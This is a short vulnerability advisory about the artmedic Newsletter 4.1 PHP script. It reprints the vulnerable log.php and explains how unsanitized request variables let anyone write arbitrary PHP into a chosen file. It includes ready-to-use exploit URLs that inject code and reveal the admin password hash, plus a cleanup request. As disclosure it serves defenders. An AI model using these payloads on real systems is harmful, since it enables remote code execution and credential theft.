newsletter.txt

`I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code and bypass the password protection.  
  
The reason for this is mistake in design.  
  
log.php:  
  
<?php   
$time = time();  
$date = date("d.m.Y, H:i:s");  
$remote = getenv("REMOTE_ADDR");  
$ip = getHostByAddr($remote);  
$logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&\n";  
$logdaten = fopen("$logfile", "a+");  
flock($logdaten,2);  
fputs($logdaten, $logd);  
flock($logdaten,3);  
fclose($logdaten);  
//Log-Daten nach Vorhaltezeit löschen  
//Delete old logdata  
$ablaufzeit = "$time"-"$logtime";  
$pruefung = @file($logfile);  
while (list ($line_num, $line) = @each ($pruefung))   
{  
$zeiten = explode("&&",$line);  
if($zeiten[0] <= $ablaufzeit)  
{  
$fp = fopen( "$logfile", "r" );   
$contents = fread($fp, filesize($daten));   
fclose($fp);  
$line=quotemeta($line);   
$string2 = "";  
$replace = ereg_replace($line, $string2, $contents);  
$fh=fopen($logfile, "w+");  
@flock($fp,2);  
fputs($fh, $replace);  
@flock($fp,3);  
fclose($fh);  
}}  
?>  
  
Usually the log.php is included and $logfile,$logtime and $email are declared in the parent document. If we run "log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->" we get a file anyfile.anyext with following content:  
  
<html>  
...  
unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&  
...  
</html>  
  
a simple example to reveal the admin pw Hash is  
  
log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo%20$password%20?>  
  
just launch info.php?cur=include.php and you will see it.  
  
to kill the entry type:   
  
"log.php?logfile=info.php&logtime=000000"  
  
vendor has not yet been informed, but he will be as soon as possible ...  
  
regards  
  
C.Schmitz  
  
`